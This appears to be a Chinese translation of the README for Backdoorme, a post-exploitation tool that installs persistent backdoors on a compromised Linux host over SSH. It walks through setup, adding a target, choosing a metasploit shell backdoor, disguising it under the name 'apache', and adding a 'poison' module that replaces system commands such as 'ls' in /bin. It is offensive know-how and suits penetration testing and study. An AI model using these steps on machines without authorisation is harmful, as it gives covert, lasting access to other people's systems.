像 metasploit 这样的工具非常适合利用计算机漏洞,但一旦你获得了计算机的访问权限后会发生什么?Backdoorme 通过释放一系列后门来建立长期持久性,从而回答了这个问题。
一旦与目标建立了 SSH 连接,Backdoorme 的优势就能得以发挥。不幸的是,Backdoorme 不是一个获取 root 权限的工具——它只用于在获得权限后保持该权限。
请仅在获得明确许可的情况下使用 Backdoorme——请勿未经询问就进行黑客攻击。
Backdoorme 分为两部分:后门和模块。
后门是监听端口并重定向到解释器(如 bash)的小段代码。有多种用不同语言编写的后门,以提供多样性。
模块通过更频繁地运行后门(例如每隔几分钟或在计算机启动时)来增强后门的效果。这有助于建立持久性。
演示:
要启动 backdoorme,首先确保已安装所需的依赖项。
对于 Python 3.5+:
$ sudo apt-get install python3 python3-pip python3-tk nmap
$ cd backdoorme/
$ virtualenv --python=python3.5 env
$ source env/bin/activate
(env) $ pip install -r requirements.txt
对于 Python 2.7:
$ sudo python dependencies.py
启动 backdoorme:
$ python master.py
添加目标:
>> addtarget
Target Hostname: 10.1.0.2
Username: victim
Password: password123
+ Target 1 Set!
>>
要使用后门,只需运行 "use" 关键字。
>> use shell/metasploit
+ Using current target 1.
+ Using Metasploit backdoor...
(msf) >>
然后,你可以设置与后门相关的选项。运行 "show options" 或 "help" 可查看可配置的参数列表。要设置选项,只需使用 "set" 关键字。
(msf) >> show options
Backdoor options:
Option Value Description Required
------ ----- ----------- --------
name initd name of the backdoor False
...
(msf) >> set name apache
+ name => apache
(msf) >> show options
Backdoor options:
Option Value Description Required
------ ----- ----------- --------
name apache name of the backdoor False
...
与 metasploit 类似,后门按类别组织。
每个后门都可以应用额外的模块,以使其更强大。要添加模块,只需使用 "add" 关键字。
(msf) >> add poison
+ Poison module added
每个模块都有可自定义的额外参数,如果重新运行 "help",你可以查看或设置任何额外选项。
(msf) >> help
...
Poison module options:
Option Value Description Required
------ ----- ----------- --------
name ls name of command to poison False
location /bin where to put poisoned files into False
目前启用的模块包括:
Backdoorme 支持同时操作多个不同的目标,按输入时的编号组织。核心维护一个"当前"目标,任何新的后门将默认针对该目标。要手动切换目标,只需在命令后添加目标编号:"use metasploit 2" 将针对第二个目标准备 metasploit 后门。运行 "list" 可查看当前目标列表、连接是否打开或关闭,以及可用的后门和模块。
Backdoorme 仍处于初期阶段!欢迎为项目贡献——只需 fork 它,进行更改,然后提交 pull 请求。如果有关于杀手级后门的想法,或者有我们可以改进的地方?创建一个 issue,我们会尽快添加!如有任何问题,请发送电子邮件至 [email protected]。
如果你想添加自己的后门,请按照 backdoorme/backdoors/template.py 文件中的说明操作。
如果你想添加自己的模块,请按照 backdoorme/modules/template.py 文件中的说明操作。
开发者速查表: